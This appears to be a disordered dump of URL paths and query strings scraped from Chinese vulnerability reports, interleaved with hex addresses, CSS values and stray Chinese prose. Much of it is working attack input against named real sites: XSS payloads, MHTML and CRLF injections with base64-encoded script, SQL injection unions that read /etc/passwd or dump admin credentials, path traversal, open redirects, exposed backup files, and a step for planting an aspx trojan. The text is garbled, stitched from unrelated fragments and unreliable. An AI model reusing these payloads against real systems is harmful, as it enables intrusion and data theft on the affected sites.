10003D62 10003D64 10003D67 10003D68 10003D6A 10003D6D 10003D6E 10003D71 10003D76 10003D77 10003D78 10003D78 10003D78 10003D7A 10003D7A blog.chinaunix.net/space.php?domain=ydzhang /index.php?tag=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://www.douban.com/search?search_text=ax%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253A80sec%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4%252b%253D--!80sec /TR/html4/strict.dtd www.google.com/favicon.ico /support/bin/resource/all.css?v=261_7 /support/bin/request.py?contact_type=contact_policy%0dContent-Type%3Amultipart/related%3Bboundary%3Dx--x%0DContent-Location%3Ax%0DContent-Transfer-Encoding%3Abase64%0d%0dPHNjcmlwdD5hbGVydCgnZ21haWwgMGRheSB0ZXN0IGJ5ID8/PycpPC9zY3JpcHQ%2B%--x!x /love/love/previewImageAction.do?imagUrl=/../../../../../../../../../../../etc/passwd mhtml:http://tbskip.taobao.com/json/spu_price_trend.htm?callback=xx%0dx%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Asun%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%252b%253b--!sun mhtml:http://tbskip.taobao.com/json/spu_price_trend.htm?callback=xx%0dx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%2b%3b--!sun /cdo_web_servlet.cdo?strTransName=getBuyerDistrictDetail&$$CDORequest$$=%3CCDO%3E%3CSTRF%20N=%22strServiceName%22%20V=%22BuyerService%22/%3E%3CSTRF%20N=%22strTransName%22%20V=%22getBuyerDistrictDetail%22/%3E%3CLF%20N=%22lDistrictId%22%20V=%2210101%22/%3E%3C/CDO%3E /)在圈子内发帖时没有过滤输入的代码可导致提交任何危险代码 /product/phonedetail.aspx?phoneid=A0500000454 /boblog/boblog.txt]这个漏洞 /images/skin1/css.php.bak /%61%73%70%6E%65%74%5F%63%6C%69%65%6E%74/%61%6A%61%78%2E%6A%73 /info.php /admin.php /show.php/?id=17808 /show.php/?id=17808 /umodi.php?&tag=icon /main/adfclick?bid=1564,1201,202&cid=1254,1,1&db=afanie&show=ignore&sid=1196&url=http://wooyun.org /gaopeng/lp/gaopeng/register.php /gaopeng/lib/MySqlDb.inc.php5 /etc/passwd / /control/ /upload.aspx /serious-bug-of-sina-weibo/ /wow/achievement.php?id=878 /cwlk/achievement.php?id=284 /wow/zone.php?id=4273 /kdxy/itinfo.php?itid=11425 /wulin2/pzinfo.php?id=16384 /twow/itemset.php?id=143 /upload/ ?cmdID ?roomID ?gameid /?cmdID ?cmdID=2&www.wooyun.org /open_game.html?tencent://?cmdid=2&www.wooyun.org的网站。 /consultdetail.aspx?ID=83 /consultdetail.aspx?ID=83%20and%201=2%20union%20select%200,0,0,0,0,concat(char(94),char(94),char(94),load_file(0x633a5c626f6f742e696e69),char(94),char(94),char(94)),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20/*%20and%201=1 /mps/mps_shop/news_detail.jsp?newsID=24 /news.jsp?type=GY /news.jsp?type=GY /p_cs_outlet_shops_tc.jsp?mainDistrict=kl /p_cs_outlet_shops_tc.jsp?mainDistrict=kl%27%20union%20all%20select%20null,null%20from%20dual-- /p_cs_outlet_shops_tc.jsp?mainDistrict=kl'%20and%20 /search.php?keyword=%22%20onmouseover%3dprompt%28/hello_akast/%29%20bad%3d%22&kwtype=0&searchtype=titlekeyword /squirrel_zone/diaryDetail.php?picname=1%3C%2ftitle%3E1%3CScRiPt%20%3Eprompt%28/hello_akast/%29%3C%2fScRiPt%3E&picurl=05.jpg /sns/space.php?uid=83142&do=blog&id=5384 /squirrel_zone/cartoonDetail.php?picname=%B1%F9%BC%A4%C1%DC&picurl=%22%20onmouseover%3dprompt%28/hello_akast/%29%20bad%3d%22 /squirrel_zone/txDetail.php?picname=%C7%F5%B3%A4&picurl=%22%20onmouseover%3dprompt%28/HELLO_AKAST/%29%20bad%3d%22 /searchEx.do?p=[{"t":"high","name":"x","year":2012},{a:alert(document.domain)}]&s=0&ref=sg_findfriend_highschool_search /TR/html4/loose.dtd 10px small 1px normal 80% normal 1em 1px white top 2px 1px left normal 11px 1px right 5px monospace 100% hidden monospace pre 1px none 1em 30px monospace pre pointer black black none 120px none transparent relative bold /jon /queryip/ DBUtils-1.0-py2.6.egg/DBUtils/SteadyDB.py www.python.org /index.aspx?ajax=true&hospitalid=333373&doctorid=341314 /index.aspx?ajax=true&hospitalid=333373&doctorid=341314 http://data.gz2010.sohu.com/event_type_json.php?callback=----%25C9%25F1%25C2%25ED%25B9%25B7%25C6%25A8%25B6%25AB%25CE%25F7%252A%252F%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary%253D_boundary_by_mere%250D%250A%250D%250A--_boundary_by_mere%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250ADQo8c2NyaXB0Pg0KYWxlcnQoJ2hlbGxvIHdvcmxkIScpOw0KPC9zY3JpcHQ%252BDQo%253D%250D%250A--_boundary_by_mere--%250D%250A%250D%250A!cookie /sitefiles/userfiles/1.asp /purchase/shoppingcart_pop.aspx?backurl=http://www.baidu.com/ /event_type_json.php?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg www.xywy.com/mrss2/zxtj/20110011 void(0) /special/007525G0/urs-163.html?s=1#q=%20%3Cimg%20src=1%20onerror=alert%28/l4mp.org/%29%3E&start=0 /Apply/applysubmit.aspx?classid=46760 /upload/edit/ /34855/photos/ /api/album/create/ /album/23209/ /api/reply/add/ /api/reply/add/ /api/reply/add/ /api/reply/add/ /album/23198/?style=thumbnail /api/album/create/ /34855/albums/ /api/album/create/ /loginservice.aspx?callback=%3Cscript%3Ealert%28/seckeep.com/%29%3C/script%3E /lottery/ajax/get_present_friend_list.do?callBack=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg http://cgi.music.soso.com/fcgi-bin/fcg_search_xmldata.q?uin=&p=1&perpage=5&source=10&r=1300289076687&ie=utf-8&w=xxx%0Dxxxxxxxxx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD5hbGVydChsb2NhdGlvbi5ocmVmKTs8L3NjcmlwdD48YnI+DQoNCg0KDQo=%2b%3b--!sun /selfservice/toNewCreateBankCardInfo!photoView.action?pid=186 alert('XSS') /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg /?p4p=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg mhtml:http://t.qq.com/search/index.php?k=xxxxxxxx%0Dxxxxxxxxxx%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253Asun%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD4NCmFsZXJ0KC9iZWFzdGsvKTwvc2NyaXB0Pjxicj4NCg0KDQoNCg==%252b%253b--!sun mhtml:http://t.qq.com/search/index.php?k=xxxxxxxx%0Dxxxxxxxxxx%0AContent-Type%3Amultipart%2frelated%3Bboundary%3Dx--x%0AContent-Location%3Asun%0AContent-Transfer-Encoding%3Abase64%0d%0a%0d%0aPHNjcmlwdD4NCmFsZXJ0KC9iZWFzdGsvKTwvc2NyaXB0Pjxicj4NCg0KDQoNCg==%2b%3b--!sun http://t.qq.com/search/index.php?k=x%250AContent-Type%253Amultipart%252frelated%253Bboundary%253Dx--x%250AContent-Location%253A360sec%250AContent-Transfer-Encoding%253Abase64%250d%250a%250d%250aPHNjcmlwdD5hbGVydCgndGVzdGVkIGJ5IFFaJlJBeWg0YyYzNjAgc2VjIF9fX19fICAtIC0hJyk8L3NjcmlwdD4%252b%253D--!360sec /x.exe 00430C20 00430C21 00430C23 00430C26 00430C28 00430C2D 00430C33 00430C34 00430C3B /v/2jaoqR1Wirk/&snap_pic=http://localhost/include/xss.swf/v.swf /showdiary.php?id=15561'%20AnD%201=2%20UnIoN%20aLl%20SeLeCt%201,2,3,4,5,6,CoNcAt /searchResult.htm?Search=关键字 /main/adfclick?db=afanie&bid=36225,17584,334&cid=485,57,1&sid=35846&url= /main/c?d=qiyiafp-5&i=z356,95595,2767&u= /download/downpage/netarea/id/1600003/wapc/5000_0005_003 alert(1) /service/tenpay_jump.shtml?url=%68%74%74%70%3a%2f%2f%77%77%77%2e%35%31%37%33%2e%63%6f%6d /3gstock/search/notfound.php?word=%3Cscript%3Ealert%28%27pg5yl8%27%29%3C%2Fscript%3E /zzy/jsp/js/.svn/entries /ibmshowcase/view/249 /sinamall/assets/datagif/168fl/1.txt /sinamall/assets/datagif/168fl/1.txt /speaklist/ /DPS/,宽带账号点http://221.231.151.68/DPS/gotoQuan.jsp?wo=kd /Admin/FloatPostAdmin.aspx /link.php?url= /clk/request.s?d= /red/click.php?url=http://e.miaozhen.com/r.gif?%5Ek=A+30%5Eae=1085%5Eo= /r.gif?%5Ek=A+30%5Eae=1085%5Eo= /r.gif?%5Ek=A+30%5Eae=1085%5Eo=http://wooyun.org /limitBuy.aspx?callback= /detail.php?id=-1428+union+select+1,2/* /08active/413ainol/detail.php?id=-9021/**/union/**/select/**/load_file(0x2F6574632F706173737764),2,3,4/* /test1.php /bbs/attachment/Mon_1103/11_2212210_5f31437b04c3cc1.jpg /bbs/attachment/Mon_1103/11_2212210_5f31437b04c3cc1.jpg/88.php /admins/ /plain;base64,PGZ tmpFileType=lcase(up.getFileInfo(“filetype”)) /index.php?event_id=200%20and%201=2%20union%20select%201,version(),3,4,database(),6,user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 10023EFF 10023F01 10023F03 10023F05 10023F09 10023F0A 10023F0D 10023F0F 10023F11 10023F16 10023F19 10023F1B 10023F20 10023F24 10023F25 http://tieba.baidu.com/tb/js/tbnet/wuque.swf?debugMode=1&onReady=alert%282%29 text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4= /tomcat-docs/appdev/sample/web/hello.jsp?test= /article.php?acid=3'%20and%20'1'='2 /tag/right.php?tagId=44&pId=4 /list.php?id=64839存在SQL注入 /v/pL8HIu4nKC4/&snap_pic=http://secsay.com/t.sina/t.swf/v.swf /qunba.php?ac=thread_qb&tid=17421 /1.txt /liveodds/marker_asia.php?m_id=440722 / /account/settings/binding?telephone=13800138000&checkCode=&isCancel=0 /baike/pic/item/7870145538a6b092b645ae33.jpg http://www.0x50sec.org /n/phpcms/2011/0331/2.html /n/phpcms/down.php?a_k=GnRCQxxbSQpfXGAwfhwcCDUkEwMaJRVKXVZeVk1cdWVyRl5Ua3RHVkB4QVdeVFxUVVpweDkAHEI%2BeEY%3D /var/www$ /n/phpcms/play.php?a_k=GnRBQwJbXkEEUSAjIAJKCTUhSktdZl5LQEhBSExCaXhtRkJKdWtZShY9E0ofBxwUFQhjZnNPD1AoNUQLB3oCWF8eWlcRCSV4LBsL /test/test/suc.php /cn/home/search/?q= /img/baidu_logo_jr_1005_jy.gif /cn/home/search/?q= /cn/home/search/?q= /mediawiki/skins/ /statistics?origin=61001&url=http://www.sina.com.cn alert('xss') /echtoo/player.php /c.php?id=30001831&l=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /type/content.php?tid=1628&type=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /stat.php?id=33222&web_id=33222&show=%22%3E%3Cscript%3Ealert(88668066);%3C/script%3E /?keyword=【XSS】&module=search&act=search /eleven/fendou/fendou_03.php?uid=3680&vid=XMTg2MTA2OTcy%27 /info/sale/ /contribute.php?catid=22 /2011/0405/366.html /magic_image.php?gd=1&fonttype=4&txt=ADcCAw9wKjtaOhNGAS0uPQorC14OOQY%3D / /v1/main.php?siteid=你的统计代码ID&s=ipsearch /ADPolestar/lgs/way/?http://www.nowpc.net /logincheck.jsp.bak /product_detail.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /viewForum.jsp.bak /query?charset=gb2312&style=standard&database=user&exactitude=1&qt= /cmdn/supesite/newdev.controlpanel.php?usertype=personal&operation=apply /movie/search/movie_search?session=a6bb6525&q=%3Ciframe%20src%3Dhttp%3A%2f%2fwww.wooyun.org%20width%3D800%20height%3D600%20onmouseover%3Dalert%28%2fXSSed-By-xDo%2f%29%3E%3C%2fiframe%3E /pagemydns/authpage.php /login.php?burl=http://www.wooyun.org /v3/bbs/images/loading.gif /jsbug'});alert('xss')//',w:'auto',h:'auto /subject/phpinfo.php /subject/adodb/tests/ /mediawiki/images/ / / /publish/admin/config.php /search_mall.php /newsserver.asmx?op=Getnew /p/3g.163.com/sports/special/0005037G/nbaindex.html /p/3g.163.com/nba/data/match/report/2010/11910.html /ip_look.php?ip=[XSS /web1/news/ /bugs/wooyun-2010-01768的修复方案是寄托于tudou的修复 /owner/own_gift_notice.php /owner/own_gift_notice2.php /iask/wappage/j.php?url= /sinaurl.php?go=2&u= /story.php?id=7%20and%201=2%20union%20select%201,user(),@@version,4,database(),6,7 sales 4.0.26-log /account/settings.php在派送地址处的”收件人“,”街道地址处“均可成功插入跨站代码,图我就不截了,麻烦 C15DDF55-9AE3-490A-A6F5-E63020698D5C /adpolestar/wayl/;ad=B0992513_9B8E_3121_C2B1_9A0EC32FDEBD;ap=0;pu=san9;/?http://www.baidu.com /flash.html,其HTML代码如下: http://trusteddomain.com/wooyun.jpg!wooyun.swf String /flash.html Event ByteArray String /activity/list.aspx?CategoryName=Activity_2007'%20and%20'3'='3 /activity/list.aspx?CategoryName=Activity_2007'%20and%20'3'='4 /jsbug/ / /front/click?url=http://www.wooyun.org /showlist.aspx?words="%20onmouseover="alert(/xss/) /item.htm?id=9981436099 /addtopic.aspx?words=%22%20onmouseover=%22alert%28/xss/%29 /so.aspx?SearchWordUp= /search.aspx?ddlTable=zhaos&ddlCategory=%D5%D0%C9%CC_%CE%F7%D2%A9&ddlCategoryTwo=OTC%C0%E0&ddlFormula=%BC%C1%D0%CD_%C6%AC%BC%C1&searchtype=effect&searchtext=%22+onmouseover%3D%22alert(/xss/) /qunba.php?ac=thread_qb&tid=4440 /qunba.php?ac=thread_qb&tagid=657&tid=9547 /qunba.php?ac=thread_qb&tid=16173 /qunba.php?ac=thread_qb&tid=9136 /3g/pro/index.php?tid=254&did=1185&vid=2316&ch=gp&vt=3&wm=gwo%22%3E%3Ciframe%20src=http://www.google.com%3E%3C/iframe%3E /team/myteamShow.php?other_uid=1300618620 /tx2/quests.php /aion/quests.php /tx2/quests.php /blog/index.jsp / /u/11767666/profile.html /CampusSite/howtodo.aspx?id=1 /soft/261/261407.html /234.gif / /news/more.php?area=zit /treasure/tr_info.php /manage&manage_id=5 /play&vid=2488 /tv/ipad/client//video.php?vid=242 /IdeaEDriver/driver.html 9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86 /doc/skins/ /homepage/announce_view.jsp?id=2217%27+or+1%3Dutl_inaddr.get_host_address%28%28%28select+distinct+chr%28126%29%7C%7Cchr%2839%29%7C%7Ccast%28table_name+as+char%2850%29%29%7C%7Cchr%2839%29%7C%7Cchr%28126%29+from+%28select+distinct+rownum+r%2Ctable_name+from+all_tables+where+owner /talk/view.php?tid=603 /identifyingCode/ /identifyingCode/ /wp-includes/ /wp-content/themes/default/images/ /wp-content/uploads/ /wp-content/plugins/google-analyticator/ /wp-content/uploads/ /search?keyword=da /servlet/JAS?action=jobSearch&keyword=%3Cscript%3Ealert%28/by%20vini5/%29%3C/script%3E /turbosearch/search.jsp%20 /turbosearch/search.jsp%2e /turbosearch/search.jsp.bak /v/search.php?page=1&search_type=search_videos&search_id=%22%3E%3Cscript%3Ealert(/j4nker/)%3C/script%3E&sort=title webvul@sohu.com /turbosearch/admin/ /mytianyaPhoto/PicList.asp?ownerId=9958505'&dirId=1577522 /v/search.php?page=1&search_type=search_videos&search_id=%22%3E%3Cscript%3Ealert(/j4nker/)%3C/script%3E&sort=title /2011/0429/suning/index.php就是这个地址 /dc.php /home.php?s=19 /yszs/expert_online.php?type=data&uid=5173376 /i/99395512 /details.php?id=54 /include/editor/filemanager/ /iplookup/include/editor/filemanager/ /zhuangxiu/rijiku-100----.html /test/ /test/testmeta.php /test/cpup.php /baidu2011/IndexPage.aspx存在高危FCK编辑器漏洞! /x1/2011/cn/)查看,您的验证码为:【5688】 /icons/ /phpinfo.php /htdocs/ /data/ /admin/ /admin/ /FCK/editor/filemanager/browser/default/connectors/test.html /php.php /admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 /tools/rss.aspx就可以了。 /admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default,写入aspx木马。 /tools/rss.aspx就可以了。 / /index/ /index/?province=110000 /about/ /about/privacy/ /feedback/ /mobile/ /merchants/ /account/referrals/ /account/signup/ /help/api/ www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.htm其实除了filter这个外,folder也没做过滤,直接可以www.xx.com/admin/Folder.aspx?noSelect=0&folder=c:/windows/system32&filter=*.htm访问任意目录 /User/CommPages/FolderImageList.asp?CurrPath=/admin/ /User/CommPages/FolderImageList.asp?CurrPath=/123456/ /User/FileManage.asp?Type=FolderReName&OldFileName=../../123456&NewFileName=654321 /html/c68dcc7c-d336-8c03-7fd7-cdbd18f025ef.htm www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.htm www.xx.com/admin/Folder.aspx?noSelect=0&folder=/_skins/r&filter=*.aspx /zhiqingadmin/?_a=manage&_c=tieba&_page=1 /user/index.aspx?urls=http://www.XXX.com /user/index.aspx点击控制面板,修改资料,职业处存在存储型xss /user/index.aspx点击社区/讨论- /bbs/uc_server/admin.php?m=user&a=login&iframe=&sid='%22%3E%3Ciframe%20src=http://www.pker.in%3E /a/j/dm3/index.jsp?sid=XXXXXXXXXXXXXXXXXXXXX /cgi-bin/setting1?sid=eP6_czyZRqFmXFwR&fun=list&loc=frame_html,,,3 /paycenter/index/num/22201410%20a SELECT Unknown Errno:1054 MySQL SELECT Unknown Errno:1054 MySQL /infoxxx/upload/2011.php www.xxx.com www.xxx.com www.xxx.com.test.com /news_through/luyan.php?id=19%20and%201=2%20union%20select%201,user(),3,4,5,version(),7 / /upload/index.php /subscribe.php中对post数据中的跨站脚本过滤不严 www.xxx.com/UserCenter/main.aspx www.xxx.com/Template/T_xx00.aspx / /list.php?cid=131-1%20UNION%20SELECT%20concat%28username,0x3A,password%29,2,3,4,5%20from%20cms_admin-- /kb/834141/ /common/modules/mail/houseweek_more.php?id=-313+union+select+1,2,3,user(),5,6,version(),8,9,10,11,12,13,14,15,16 /cn/ZuanSou_Index.html?soho=1 /whitehats/XXX,本应该是http://wooyun.org/corps/XXX /dashan/show/guess?fun=alert&arg=haha /dashan/show/guess?fun=document.write&arg=haha qunar /ca_test.jcp?fromCity=&type=&callback=%3Cscript%3Ealert(1)%3C/script%3E&charset=gbk /lowerPrice.jcp?&callback=%3Cscript%3Ealert(1)%3C/script%3E /p/city?s=31#hello\ /biaobai/addBiaoBai?content=表白内容&beiId=表白对象ID号&beiName=表白对象名&userType=0 /biaobai/addPublic?beiId=表白对象ID /biaobai/addDoing?c=表白内容&type=2 /feedcommentreply.do?fin=15&ft=status&ff_id=状态主id&c=回复内容&owner=状态主id&requestToken=686920806&source=状态id&t=3,可以据此构造出一个链接,当别的用户点击这个链接时,就会在不知情的情况下在某条状态下回复攻击者指定的内容 /building_list.asp?id=28 /building_list.asp?id=28 /58show.php?key5=%E4%BA%A4%E5%8F%8B%22%3E%3Cscript%20window.open(%22www.baidu.com%22)%3C/script%3E%3Ctextarea%20cols=100%20rows=111%3E%E8%BF%99%E6%A0%B7%E5%8F%8D%E5%A4%8D%E4%BA%86%E8%AE%B8%E5%A4%9A%E5%90%8E%E6%AC%A1%E5%90%8E%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%BE%84%E8%87%AA%E8%B5%B7%E8%BA%AB%E8%B5%B0%E5%87%BA%E9%97%A8%E5%A4%96%E5%8E%BB%EF%BC%8C%E5%A5%B3%E4%BA%BA%E4%BC%B8%E5%A4%B4%E5%96%8A%E4%BA%86%E5%87%A0%E5%A3%B0%E4%BB%96%E4%B9%9F%E4%B8%8D%E7%90%86%E3%80%82%E7%AD%89%E6%88%91%E5%BF%AB%E5%90%83%E5%AE%8C%E6%97%B6%EF%BC%8C%E9%82%A3%E7%94%B7%E4%BA%BA%E5%9B%9E%E6%9D%A5%E4%BA%86%EF%BC%8C%E6%89%8B%E9%87%8C%E8%BF%98%E6%8A%93%E7%9D%80%E4%B8%80%E4%B8%AA%E6%96%B0%E8%80%83%E5%A5%BD%E7%9A%84%E7%BA%A2%E8%96%AF%EF%BC%8C%E8%BF%98%E5%86%92%E7%9D%80%E7%99%BD%E7%99%BD%E7%9A%84%E7%83%AD%E6%B0%94%E3%80%82%E4%BB%96%E7%A2%B0%E4%BA%86%E4%B8%80%E4%B8%8B%E5%A5%B3%E4%BA%BA%EF%BC%8C%E5%B0%B1%E5%B0%86%E7%83%AD%E4%B9%8E%E4%B9%8E%E7%9A%84%E7%BA%A2%E8%96%AF%E8%BF%9E%E7%9A%AE%E9%83%BD%E6%B2%A1%E5%89%A5%E5%BC%80%E5%B0%B1%E5%A1%9E%E5%88%B0%E5%A5%B3%E4%BA%BA%E6%89%8B%E9%87%8C%EF%BC%8C%E4%BD%8E%E5%A3%B0%E5%9C%B0%E8%AF%B4%EF%BC%9A%E2%80%9C%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%B8%A6%E7%9D%80%E6%B5%93%E5%8E%9A%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E6%88%91%E7%9C%8B%E5%88%B0%E5%A5%B3%E4%BA%BA%E5%8F%91%E6%84%A3%E5%9C%B0%E7%9C%8B%E4%BA%86%E7%9C%8B%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E4%B8%80%E4%B8%8B%EF%BC%8C%E8%84%B8%E4%B8%8A%E6%B5%AE%E7%8E%B0%E5%87%BA%E4%BA%86%E5%B9%B8%E7%A6%8F%E7%9A%84%E5%BE%AE%E7%AC%91%E3%80%82%E6%88%91%E7%8C%9C%E6%83%B3%EF%BC%8C%E5%A5%B9%E5%A4%A7%E6%A6%82%E6%98%AF%E6%83%8A%E8%AE%B6%E8%87%AA%E5%B7%B1%E7%9A%84%E4%B8%88%E5%A4%AB%E5%B9%B3%E6%97%B6%E4%B8%8D%E8%88%8D%E5%BE%97%E8%8A%B1%E9%92%B1%EF%BC%8C%E4%BD%86%E4%BB%8A%E5%A4%A9%E5%8D%B4%E8%8A%B1%E9%92%B1%E4%B8%BA%E8%87%AA%E5%B7%B1%E4%B9%B0%E5%90%83%E7%9A%84%E3%80%82%E7%84%B6%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%80%E5%A7%8B%E7%BB%86%E7%BB%86%E5%9C%B0%E3%80%81%E5%B0%8F%E5%BF%83%E5%9C%B0%E5%90%83%E5%90%83%E7%9D%80%E3%80%82%E5%BD%93%E5%8F%AA%E5%89%A9%E4%B8%8B%E4%B8%80%E5%8D%8A%E5%90%8E%EF%BC%8C%E5%A5%B9%E5%BF%BD%E7%84%B6%E5%81%9C%E4%B8%8B%E6%9D%A5%EF%BC%8C%E6%8A%8A%E6%89%8B%E9%87%8C%E7%9A%84%E5%8D%8A%E5%9D%97%E7%BA%A2%E8%96%AF%E9%80%92%E5%88%B0%E4%B8%88%E5%A4%AB%E7%9A%84%E5%98%B4%E8%BE%B9%EF%BC%8C%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E5%90%83%E9%A5%B1%E4%BA%86%EF%BC%8C%E4%BD%A0%E5%90%83%E5%90%A7%EF%BC%81%E2%80%9D%E5%90%8C%E6%A0%B7%E5%B8%A6%E7%9D%80%E6%B5%93%E9%87%8D%E7%9A%84%E5%9C%B0%E6%96%B9%E5%8F%A3%E9%9F%B3%E3%80%82%E5%A5%B9%E4%B8%88%E5%A4%AB%E6%8E%A8%E5%BC%80%E8%AF%B4%EF%BC%9A%E2%80%9C%E6%88%91%E4%B8%8D%E5%90%83%E3%80%82%E2%80%9D%E8%99%BD%E7%84%B6%E9%82%A3%E7%94%B7%E4%BA%BA%E8%AF%B4%E4%B8%8D%E5%90%83%EF%BC%8C%E4%BD%86%E6%98%AF%E4%BB%96%E5%8D%B4%E6%82%84%E6%82%84%E5%9C%B0%E5%92%BD%E4%BA%86%E5%92%BD%E5%8F%A3%E6%B0%B4%EF%BC%8C%E5%9B%A0%E4%B8%BA%E6%88%91%E7%9C%8B%E5%88%B0%E4%BB%96%E7%9A%84%E5%96%89%E7%BB%93%E5%8A%A8%E4%BA%86%E5%8A%A8%E3%80%82%E4%B8%A4%E4%BA%BA%E6%8E%A8%E6%9D%A5%E6%8E%A8%E5%8E%BB%E5%A5%BD%E4%B8%80%E4%BC%9A%E5%84%BF%E5%90%8E%EF%BC%8C%E5%A5%B3%E4%BA%BA%E5%B0%B1%E5%BC%BA%E8%A1%8C%E5%B0%86%E7%BA%A2%E8%96%AF%E5%A1%9E%E5%88%B0%E7%94%B7%E4%BA%BA%E7%9A%84%E6%89%8B%E9%87%8C%EF%BC%8C%E5%A5%B3%E4%BA%BA%E7%9C%8B%E7%94%B7%E4%BA%BA%E5%90%83%E5%AE%8C%EF%BC%8C%E4%BE%BF%E7%9B%B8%E8%A7%86%E8%80%8C%E7%AC%91%EF%BC%8C%E7%84%B6%E5%90%8E%E5%8F%88%E9%9D%A0%E5%9C%A8%E4%B8%80%E8%B5%B7%E7%BC%A9%E7%9D%80%E5%9D%90%E7%9D%80%E3%80%82%E9%82%A3%E5%A5%B3%E4%BA%BA%E7%9C%8B%E5%88%B0%E6%88%91%E7%9C%8B%E4%BB%96%E4%BF%A9%EF%BC%8C%E5%8F%88%E5%BE%AE%E5%BE%AE%E7%9A%84%E7%AC%91%E4%BA%86%E7%AC%91&%3C/textarea%3E /index.php?app=newlist&pid=9 /ditu/ditu_traffic_page.php?city=&address=d%22/%3E%3Cscript%3Ealert%281%29%3C/script%3E /auth/login/?action=authByRTX /?_a=login /admin/login.jsp /auth/login /ifengepgwebM/CheckIn.aspx?ReturnUrl=%2fifengepgwebM%2fProgramEdit.aspx /ifengepgwebM/CheckIn.aspx?ReturnUrl=%2fifengepgwebM%2fProgramEdit.aspx / /view.php?chId=9152&docId=6644573&docName=http://www.wooyun.org.&docUrl=. /video/webinar_subject.php?webinar_id=502 /admin/login.php /u/yzs/358922.shtml www.iresearch.cn\project\DataProvider\SqlDataProvider.cs:934 www.iresearch.cn\project\DataProvider\SqlDataProvider.cs:902 www.iresearch.cn\project\DAL\sys_blog.cs:371 cs:253 /caseinfo.asp?Newid=209&cid=1 /db/login.php /zsjyc/viewnews.asp?id=1107 /old/aboutus.php /old/aboutus.php /?s=thread&bid=2235&tid=5841 /adsclick?seq=20110526000091&loc=Auto_CXK_Width1 /index_detail.php?iid=9262%22%3E%3Cscript%3Ealert%281%29%3C/script%3E%3C%22 /read.asp?id=2325 /data/account/ 